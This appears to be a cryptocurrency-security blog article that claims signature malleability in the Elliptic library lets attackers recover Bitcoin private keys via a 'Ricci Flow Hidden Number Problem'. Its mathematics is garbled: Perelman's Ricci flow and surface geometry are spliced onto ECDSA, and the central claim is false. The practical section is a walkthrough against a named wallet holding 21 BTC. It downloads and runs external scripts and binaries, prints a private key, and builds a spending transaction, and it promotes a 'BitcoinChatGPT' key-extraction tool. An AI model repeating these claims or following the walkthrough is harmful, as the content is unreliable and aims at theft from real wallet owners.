A vulnerability known as Signature Malleability poses a serious threat to Bitcoin and Ethereum cryptocurrencies that use the Elliptic Curve Digital Signature Algorithm (ECDSA). This vulnerability allows attackers to manipulate signatures, creating invalid but acceptable signatures for the system. This article discusses the mechanisms of exploitation of this vulnerability, its implications for the security of cryptocurrencies, and proposed measures to mitigate it. ECDSA (Elliptic Curve Digital Signature Algorithm) is an algorithm that is widely used to create digital signatures for a BTC or ETH coin transfer transaction in Bitcoin and Ethereum cryptocurrencies. The signature consists of two components: r and s , which depend on a random nonce k (NONCE) and a private key x (PrivKey) of the signatory.
How does Signature Malleability vulnerability occur in Bitcoin transaction?
Signature Malleability vulnerabilities arise because it is possible to change the value s in a signature while maintaining the validity of the signature. This is possible because multiple equivalent values ( r , s ′) can be obtained for the same signature :
(where n is the order of the elliptic curve group secp256k1 ). In this way, an attacker can create a new signature that will be accepted as valid by the system. Insufficient value checking : If the values of r and s are not checked for valid ranges (e.g., must be between 1 and n −1 ), this may allow attackers to use incorrect values to create fake signatures.
CVE-2024-42461: Signature Malleability in Elliptic Library for ECDSA
One such vulnerability is CVE-2024-42461 , discovered in the Elliptic library used to implement the ECDSA (Elliptic Curve Digital Signature Algorithm) digital signature algorithm. CVE-2024-42461 affects version 6.5.6 of the Elliptic library for Node.js and is classified as a low-severity vulnerability with a CVSS score of 5.3. The problem is that the library allows the use of signatures encoded in the BER (Basic Encoding Rules) format . This creates an opportunity for attackers to modify signatures without invalidating them, which opens the way for various attacks.
CVE-2024-42461 is a vulnerability found in the Elliptic library used to implement the Elliptic Curve Digital Signature Algorithm (ECDSA) in Node.js. This vulnerability is related to the Ricci Flow Hidden Number Problem (Ricci Flow HNP) , which makes it particularly important for the security of cryptographic applications. The Hidden Number Problem is a mathematical problem that consists of finding a hidden number used in the encryption process. In the context of ECDSA, if an attacker can solve the HNP, this can lead to the compromise of private keys. CVE-2024-42461 allows a potential attacker to extract information about private keys from signatures, which compromises the integrity of digital signatures and user authentication. This vulnerability opens up a wide range of attacks, as the vulnerability can be used in various attacks, including authentication and data integrity attacks. This could cause serious problems for systems that rely on ECDSA to secure Bitcoin and Ethereum cryptocurrency transactions.
Compromise of Private Keys : A successful Ricci Flow HNP solution could allow an attacker to gain access to private keys, leading to the ability to forge Bitcoin and Ethereum transaction signatures.
Ricci Flow HNP
The Ricci Flow Hidden Number Problem (HNP ) has become a key tool in proving theorems such as the Thurston elliptization conjecture , Geometrization conjecture , and Poincaré conjecture , which concern the topology of manifolds. Hamilton and later Grigori Perelman used this approach to obtain deep results about the structure of manifolds, which can mean using flow to identify and analyze hidden geometric features of manifolds, allowing one to infer their topology and other properties.
The Ricci flow is closely related to curvature theory, since it uses the Ricci tensor to describe changes in the Riemannian metric on a manifold.
Basic Relationships Between Ricci Flow and Curvature
- Ricci Tensor: The Ricci flow is based on the Ricci tensor, which is the average of sectional curvatures. It reflects how the shape of a manifold changes with its curvature, where it is formulated as the problem of finding a hidden number when the results of a function applied to combinations of that number with known elements are known. This can be useful in the context of cryptography, especially in public-key systems where it is important to minimize leakage of information about private keys.
- Curvature dynamics: During the Ricci flow, the metric changes in such a way that the curvature can increase or decrease. This allows us to analyze how the geometric properties of the manifold affect its topology.
- Singularities: The Ricci flow can lead to singularities, points where the curvature becomes infinite. Studying these singularities is key to understanding the long-term behavior of the flow and its application to topological problems such as the Poincaré conjecture.
- Maximum principle: The Ricci flow preserves the positivity of the scalar curvature, which allows us to use maximum principles to analyze the geometric properties of manifolds under deformation.
In the context of elliptic curves, Ricci flows can be used to analyze their geometric properties and understand the relationships between different structures on these curves . The indicatrix of curvature, or Dupin indicatrix , is constructed in the tangent plane at a given point on the surface according to the following rule. The coordinate axes in the tangent plane coincide with the principal directions. On the ray located in each direction, a segment is laid off equal to the reciprocal square root of the normal curvature of the surface in this direction
Classification of surface points
There are surfaces consisting of points of one, two or three types.
This quadratic equation may have one or two roots — asymptotic directions, or no roots. The presence of a root provides an ordinary differential equation of the first order, the indication of a point on the surface sets the initial conditions for its solution. The theorem of the existence and uniqueness of the solution of the Cauchy problem for an ordinary differential equation of the first order, proved in courses on mathematical analysis, leads to the following geometric result. On a surface consisting of elliptical points, there are no real asymptotic lines; on a surface consisting of hyperbolic points, there is an asymptotic network; on a surface consisting of parabolic points that are not flattening points, a unique asymptotic line passes through each point.
Optimization of algorithms
The methods developed in the framework of Ricci flow theory can be adapted to optimize computations in elliptic curve cryptography, especially in the context of operations on points on elliptic curves secp256k1. Thus, the Ricci flow not only serves as a tool for studying the evolution of metrics, but also provides a deep connection between geometry and topology through curvature analysis. Take for example the numbers “N” and “P” which are important parameters in the context of elliptic curve cryptography, especially in the secp256k1 standard, which is widely used in the Bitcoin and Ethereum blockchain and cryptocurrency.
The meaning of the number N
N is the order of the group of points on the elliptic curve. It determines the maximum number of points that can be used to generate keys in cryptographic algorithms. In the case of secp256k1 , the value of N is:
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
This number also indicates that when working with this curve, all operations must be performed within this order.
The meaning of the number P
P is a characteristic of the elliptic curve itself, a prime number that defines the field in which the work on the points on the curve occurs. The value of P for secp256k1 is:
P = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f
This number specifies the size of the field, which is important for determining the range of possible values of the coordinates of points on the curve.
Difference between N and P
- Group Order (N) : Determines the number of points on the curve that can be used for cryptographic operations.
- Prime Number (P) : Defines the field in which the curve operates. This number is important for mathematical operations on points on the curve.
Thus, although both numbers play a key role in ensuring the security and functionality of cryptographic systems, they perform different functions: N concerns the structure of a group of points , and P concerns the structure of a field .
Vertical position value of N and P
Python script: value_n.py
Python script: value_p.py
How to exploit Signature Malleability in Bitcoin transaction?
To implement a full-fledged attack on Bitcoin using the Signature Malleability vulnerability, it is necessary to change the equivalent value ( s ′) as shown in the second column of the table of components of the value (R, S, Z) of the digital signature in ECDSA .
P = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f
For a successful attack on Bitcoin, 32 ECDSA signature transactions are enough , where by changing the two initial digits of HEX to the equivalent value ( s ′) we build a table to determine the range of possible values of the coordinates of points on the curve, as well as optimizing the mathematical algorithms developed within the framework of the Ricci flow theory. Since Ricci flows are closely related to the curvature theory, we can use the average value of the sectional curvature and solve the hidden number problem, where by applying the obtained data to 32 Bitcoin transactions we extract from the given values (R, S, Z) the initial data for the secret keys : ( k ′) NONCE for 32 Bitcoin transactions and using the Ricci Flow HNP (Ricci Flow Hidden Number Problem) tool we find the hidden number: ( x ′) PrivKey – private key .
The R and S values are the main components of a digital signature in ECDSA
The R value is the coordinate of a point on the elliptic curve that results from mathematical operations involving a private key and a random number (called a “cryptographic random number”). This value ensures that the signature is unique for each message, even if it is signed with the same private key.
The value of S is calculated based on the message digest (hash function) and the private key. It is related to how well the signature verifies the authenticity of the message. The value of S also depends on the value of R and the random number.
How R and S are formed (signature verification method)
The process of generating R and S values involves the following steps:
- Generating a message digest : First, a hash of the message is created using an algorithm such as SHA-256.
- Random Number Selection : A random number is generated and used to create a point on the elliptic curve.
- Calculating R : Using this random number, the coordinate of a point on the curve is calculated, which becomes the R value.
- Calculation of S : The value of S is calculated given the message digest and the private key.
When verifying a signature, the recipient uses the R and S values along with the sender’s public key and the message digest to verify the authenticity of the signature. If all calculations match, this means that the message was indeed signed by the owner of the corresponding private key.
How to get R, S, Z value from RawTX (Signature Decoding Method)
RawTX is an encoded representation of a Bitcoin transaction in hexadecimal format. It contains all the data needed to complete a Bitcoin transaction.
Extract R, S, Z:
- A signature in ECDSA consists of two components: R and S . After decoding RawTX, find the field containing the signature (usually part of the transaction input).
- The signature will be represented as a DER encoding . You will need to extract the R and S values from this signature. They are usually represented as two integers, which can be extracted using deserialization .
- The Z value is a hash of the message being signed. To get Z, you have to hash the transaction data (usually using SHA-256) that was signed.
Decoding RawTX with decoderaw tool
First, let’s get RawTX, the encoded Bitcoin transaction in hexadecimal format. 1
Let’s open a new notebook in Google Colab
Command:
!git clone https://github.com/smartibase/Broadcast-Bitcoin-Transaction.git
cd Broadcast-Bitcoin-Transaction/
!python setup.py
Command:
cd decoderaw/
!chmod +x decoderaw
ls
!./decoderaw
Command:
!./decoderaw 01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b48304502210097255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe002201014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d50141049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461ffffffff01d2040000000000001976a914d77522a2b18e0064aba02ca7f864a5bb2299825988ac00000000
Result:
1111,0097255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe0,1014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d5,931a52e8610cf87b6d00875f687042224c305865fd20ecb15ef76b1277ba10fd,0000
Practical part
From the theory of vulnerability CVE-2024-42461 it is known that attackers can use incorrect values to create fake transaction signatures. Let’s move on to the practical part of the article and consider an example using a Bitcoin wallet: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw , where there were lost coins in the amount of: 21.2529214 BTC as of November 2024, this amount is: 1744572.51 USD
Solution of differential equation
Solutions of differential equations help to model various processes, this formula allows us to understand and predict the behavior of various systems depending on the change in variables.
General solution of a differential equation where the function y depends on the variable x .
- Original equation :
- The left side of the equation can be interpreted as the derivative of the function y with respect to x , which is equal to the product of two functions: g ( y ) , depending on y , and h ( x ) , depending on x .
- Rewriting the equation :
- The equation can be rewritten in a form that separates the variables:
After separating the variables, we can integrate both sides exactly:
Left side relative to y :
Right side relative to x :
We will explore the relationship between variables through integration [ frac{dy}{dx} = g(y)h(x) quad Rightarrow quad frac{1}{g(y)} dy = h(x) dx ]
and apply a tool for mathematical analysis and solving differential equations.
Perelman Work
Example #1 using the DarkSignature tool:
Let’s go back to the root directory of the Broadcast Bitcoin Transaction repository
Command:
cd -
ls
Command:
cd darksignature/
!chmod +x darksignature
ls
!./darksignature
To obtain the public key to the Bitcoin Address 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw, select the command:
darksignature -address <Bitcoin Address>
Enter the Bitcoin address and get the public key :
!./darksignature -address 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw
Result:
pubkey: (HEX) = 049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461
Example #2 using Dockeyhunt Lattice Attack tool:
We launch the Dockeyhunt Lattice Attack software and "Input date"
enter the Bitcoin Address 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw in the field and receive the public key of the wallet:
049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461
Let’s use the DarkSignature tool to get fake data R, S, Z values for the ECDSA algorithm transaction. In the field, "Input date"
enter the public key of the Bitcoin Address 049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461
and get the data R, S, Z values in the amount of 32 Bitcoin transactions .
Apply getting fake data value R, S, Z for ECDSA algorithm transaction in Google Colab
Let’s install the ECDSA module:
pip install ecdsa
To obtain coordinates (Gx, Gy)
for the public key, we will use a Python script: darksignature/coordinates.py
Let’s use the command:
darksignature -pubkey <Gx Gy>
We run the Python script code : darksignature/transactions.py and get the data values R, S, Z in the amount will be 32 Bitcoin transactions .
After generation we get the file: SignatureRSZ.txt
Also in the root directory: c:\PerelmanWork\Dockeyhunt Lattice Attack\
we get the file: Signatures.txt
As we can see the first two digits the value of S is arranged as the Order of the group (N)
Python script: value_n.py
As a tool for mathematical analysis and solving differential equations, we will use the Perelman Work software . We will select the option from the Functions and Graphs section for a complete relationship between variables through the integration of First-order differential equations: [ frac{dy}{dx} = g(y)h(x) quad Rightarrow quad frac{1}{g(y)} dy = h(x) dx ]
Ricci Flow Hidden Number Problem
We copy the values from the file: Signatures.txt according to the list and paste them into the input field Ricci Flow HNP
to build completely new transactions of the ECDSA algorithm .
Using Perelman Work and Dockeyhunt Lattice Attack, we arbitrarily change variables to Signature Malleability vulnerability as we wrote at the beginning of the article this vulnerability in Bitcoin transaction occurs due to the fact that it is possible to change the value of S in the signature, while maintaining the validity of the signature. As we reported in the arbitrary formula all this is possible due to the fact that for the same signature it is possible to obtain several equivalent values (r,s′) :
As a final result of the transformation of variables in the signature value R, S′, Z we see two digits the value S ′ is built as a field structure (P) :
P = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f
This number defines the field in which the secp256k1 curve operates to perform mathematical operations on points on an elliptic curve .
Python script: value_p.py
Now we know the signatures of the difference between the numbers N and P . When reducing, we can get a hidden number X as we know when shifting the generation of one-time numbers (NONCES) , the value of the signature variables R, S′, Z will tend to one point. This point will be a hidden number, that is, a private key .
( N are point group structures , P are field structures , X is a private key )
To obtain a private key, we will use the lattice reduction algorithm (theorem of large numbers) .
Lenstra-Lenstra-Lovasz (LLL) Lattice Reduction Algorithm
Let’s use the LLL source code from Darío Clavijo, a well-known developer on GitHub: daedalus
Install SageMath in Google Colab:
!sudo apt-get install sagemath python3-ecdsa
Commands:
!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/refs/heads/main/36SignatureMalleability/latticereductions.py
!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/refs/heads/main/36SignatureMalleability/Ricci_Flow_Hidden_Number_Problem.txt
Run the Python script: latticereductions.py and get the private key to the Bitcoin Address: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw
!cat Ricci_Flow_Hidden_Number_Problem.txt > nonces.csv
!python latticereductions.py nonces.csv 243 32
Result:
17e96966f15a56993e13f8c19ce34a99111ad768a051d9febc24b6d48cae1951
!pip install bitcoin
Let’s run the code to check the Bitcoin Address match:
__________________________________________________
Private Key WIF: 17e96966f15a56993e13f8c19ce34a99111ad768a051d9febc24b6d48cae1951
Bitcoin Address: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw
total_received = 21.25292140 Bitcoin
__________________________________________________
That’s right! The private key corresponds to the Bitcoin Wallet.
Let’s open bitaddress and check:
ADDR: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw
WIF: 5HzpNjEsxrpxPFqBKaoRSnFeq7RP57mvzwgoQFVtAJNZBpLVyur
HEX: 17e96966f15a56993e13f8c19ce34a99111ad768a051d9febc24b6d48cae1951
Dockeyhunt Lattice Attack
Let’s consider obtaining a private key using the Dockeyhunt Lattice Attack software as an example
To start the lattice reduction algorithm, click on the button: Private Key
Next we need to make sure that we have received the required private key value in HEX format.
Click on the button
Bitcoin Address
and get the required value of the private key in HEX format
17e96966f15a56993e13f8c19ce34a99111ad768a051d9febc24b6d48cae1951: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw
We also click on the button
Balance BTC
and get the result of the balance amount:
_____________________________________________________________________________________________________
17e96966f15a56993e13f8c19ce34a99111ad768a051d9febc24b6d48cae1951: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw: 21.2529214 BTC
_____________________________________________________________________________________________________
Private key received!
To search for the Signature Malleability vulnerability, as a threat prevention for your own Bitcoin and Ethereum cryptocurrency wallet, we can use and apply various machine learning methods to examples .
Let’s use the list from “Tutorials Power AI” a widely used category of artificial intelligence to introduce business in various fields of cryptanalysis and cryptography in general.
Installation command:
git clone https://github.com/demining/Tutorials-Power-AI.git
cd Tutorials-Power-AI/
python tutorials.py
BitcoinChatGPT is an innovative AI-powered chatbot that helps users find vulnerabilities in Bitcoin cryptocurrency transactions. BitcoinChatGPT benefits and classifications give you the ability to check your Bitcoin address for various crypto wallet attack schemes. Machine learning based on cryptanalysis gives us the full ability to investigate various attacks on the algorithms used in the Bitcoin ecosystem. Bitcoin Wallet private key extraction tools are widely popular, where BitcoinChatGPT serves as an important and useful resource for cybersecurity.
Exploiting the CVE-2024-42461: Signature Malleability vulnerability in the Elliptic library to create a Raw transaction using the BitcoinChatGPT machine learning process
Let’s consider the construction of the structure of a vulnerable Raw transaction in which the BitcoinChatGPT module is used
Let’s open the Google Colab version:
https://colab.research.google.com/drive/1YGZiPtgY0vPQ3PwUvbAjQW8LcErVHRsT
State of a vulnerable transaction in Bitcoin:
01000000
....01
........0dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935
............00000000
........8b483045
....0221
...........00
...........97255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe0
....0220
........1014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d5
.....0141
.....049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461
....ffffffff
01
....d204000000000000
........1976
............a914
........d77522a2b18e0064aba02ca7f864a5bb22998259
....88ac
00000000
Let’s combine all the output values into one common string using the Python script combinex.py :
01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b48304502210097255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe002201014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d50141049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461ffffffff01d2040000000000001976a914d77522a2b18e0064aba02ca7f864a5bb2299825988ac00000000
Let’s open the BlockCypher option “Decode A Transaction” :
https://live.blockcypher.com/btc/decodetx
After decoding the vulnerable Bitcoin Raw transaction we get the result:
{
"addresses": [
"1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK",
"1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw"
],
"block_height": -1,
"block_index": -1,
"confirmations": 0,
"double_spend": false,
"fees": 2606688996428,
"hash": "a5828ec5775b967c36ab5c6a0184aaa52fd64e6650d07287cc7688266c6dbb28",
"inputs": [
{
"addresses": [
"1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK"
],
"age": 344419,
"output_index": 0,
"output_value": 2606688997662,
"prev_hash": "35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d",
.......
.......
.......
Pay attention to Bitcoin HASH160: d77522a2b18e0064aba02ca7f864a5bb22998259
Transaction Script
The above script has been decoded
BitcoinChatGPT creates a transaction structure using HASH
the public key, where we see that Bitcoin address: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw sends 1234 satoshi
to the same address within its network.
Bitcoin HASH160 was generated using Python Script: wif_to_hash160.py
https://github.com/demining/CryptoDeepTools/blob/main/36SignatureMalleability/wif_to_hash160.py
Question – Answer:
Finally, the BitcoinChatGPT module outputs the response to the file: KEYFOUND.privkey storing the private key in two most used formats HEX & WIF
https://github.com/demining/CryptoDeepTools/blob/main/36SignatureMalleability/KEYFOUND.privkey
============================= KEYFOUND.privkey =============================
Private Key HEX: 0x17e96966f15a56993e13f8c19ce34a99111ad768a051d9febc24b6d48cae1951
Private Key WIF: 5HzpNjEsxrpxPFqBKaoRSnFeq7RP57mvzwgoQFVtAJNZBpLVyur
Bitcoin Address: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw
Balance: 21.25292140 BTC
============================= KEYFOUND.privkey =============================
BitcoinChatGPT №5 Signature Malleability Vulnerability Algorithm
Vulnerable Raw Transaction
Let’s create a vulnerable Raw transaction from the received data using the Broadcast Bitcoin Transaction repository
Download and install the source code, open the terminal and run the command:
git clone https://github.com/smartibase/Broadcast-Bitcoin-Transaction.git
Catalog:
cd Broadcast-Bitcoin-Transaction
Let’s install three important libraries:
Let’s run the command:
pip install -r requirements.txt
Let’s open the main file in Notepad ++ and make a small change to the Python Script code: main.py
from io import BytesIO
from secp256k1 import *
from sighash import *
pk = PrivateKey.parse("5HzpNjEsxrpxPFqBKaoRSnFeq7RP57mvzwgoQFVtAJNZBpLVyur")
pk.address()
tx = bytes.fromhex("35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d")
index = 0
send = "1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw"
tx_in = TxIn(tx, index, b'', 0xffffffff)
tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey']
tx_in._value = 2345
tx_ins = [ tx_in ]
tx_outs = [
TxOut(1234, Tx.get_address_data(send)['script_pubkey'].serialize())
]
tx = Tx(1, tx_ins, tx_outs, 0, testnet=True)
signature(tx, 0, pk)
tx.serialize().hex()
print(tx.serialize().hex())
f = open("RawTX.txt", 'w')
f.write("" + tx.serialize().hex() + "" + "\n")
f.close()
Let’s run the command:
python main.py
Let’s open the RawTX file in the directory:
01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b48304502210097255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe002201014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d50141049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461ffffffff01d2040000000000001976a914d77522a2b18e0064aba02ca7f864a5bb2299825988ac00000000
The order of actions in the video:
- It was this vulnerable RawTX that we looked at at the beginning of this article: ↩︎
As we know from the prompt responses of the BitcoinChatGPT module , the Signature Malleability Vulnerability Algorithm can be used to solve complex cryptographic problems.
Conclusion
There are many methods to detect and prevent counterfeit signatures in the Bitcoin network. These methods range from simple solutions such as increasing the number of confirmations to more complex anomaly analysis systems and regular security protocol updates. Effective protection requires a comprehensive approach to network security and constant monitoring of new threats. Counterfeit signatures can lead to fraudulent transactions and loss of funds. The main methods used to detect and prevent such attacks are:
1. Increasing the number of confirmations
One of the simplest ways to protect against counterfeit signatures is to increase the number of confirmations of a transaction before it is finally accepted. It is recommended to wait for at least six confirmations to reduce the likelihood of a successful attack. This ensures that the transaction was included in the block and cannot be reversed.
2. Analysis of blocks and transactions
Mining software and network nodes analyze blocks and transactions for conflicts and anomalies. This includes checking the signature for compliance with the format, as well as checking the values of r and s for acceptable ranges. If the values are outside the acceptable ranges, the transaction may be rejected.
3. Implementation of anomaly analysis systems
Using anomaly analysis systems can identify suspicious transactions and blockchains. These systems can use machine learning algorithms to detect unusual behavior in the network, which may indicate attempts to forge signatures.
4. Network monitoring software
Tools such as Wireshark can be used to analyze network traffic and identify suspicious activity. Monitoring network traffic can help identify Sybil or Eclipse attacks that can be used to manipulate transactions.
5. Regularly update security protocols
Regularly updating software and security protocols helps to eliminate known vulnerabilities, such as the DeserializeSignature vulnerability , which allows attackers to create invalid signatures. Updates should include fixes for all known vulnerabilities and security improvements.
6. Multi-level confirmation
Using multiple levels of transaction confirmation can improve network security. This could include additional checks by nodes or using third-party services to verify signatures.
References:
- Odlyzko, Andrew; te Reile, Herman JJ «Disproving Mertens Conjecture» Journal for Pure and Applied Mathematics
- D. Simon (2007). «Selected applications of LLL in number theory» LLL+25 Conference. Caen, France.
- Regev, Oded. «Lattices in Computer Science: LLL Algorithm» New York University. Retrieved 1 February 2019.
- Silverman, Joseph. «Introduction to Mathematical Cryptography Errata» Brown University Mathematics Dept. Retrieved 5 May 2015.
- Bosma, Wieb. «4. LLL» Lecture notes. Retrieved 28 February 2010.
- Abderrahmane, Nitaj. Cryptanalysis of NTRU with two public keys // International Association for Cryptologic Research. — Caen, France.
- Bleichenbacher, Daniel and May, Alexander. New Attacks on RSA with Small Secret CRT-Exponents // International Association for Cryptologic Research. — Darmstadt, Germany.
- Xinyue, Deng. An Introduction to LLL Algorithm // Massachusetts Institute of Technology.
- Liu, Jiayang, Bi, Jingguo and Xu, Songyan. An Improved Attack on the Basic Merkle–Hellman Knapsack Cryptosystems // IEEE. — Beijing 100084, China.
- Lattice algorithms using floating-point arithmetic // The FPLLL development team. FPLLL, a lattice reduction library. — 2016.
This material was created for the CRYPTO DEEP TECH portal to ensure financial data security and cryptography on elliptic curves secp256k1 against weak ECDSA signatures in the BITCOIN cryptocurrency . The creators of the software are not responsible for the use of materials.
Telegram: https://t.me/cryptodeeptech
Video material: https://youtu.be/wf6QwCpP3oc
Video tutorial: https://dzen.ru/video/watch/674116440bddfa35d730ca7a
Source: https://cryptodeeptech.ru/signature-malleability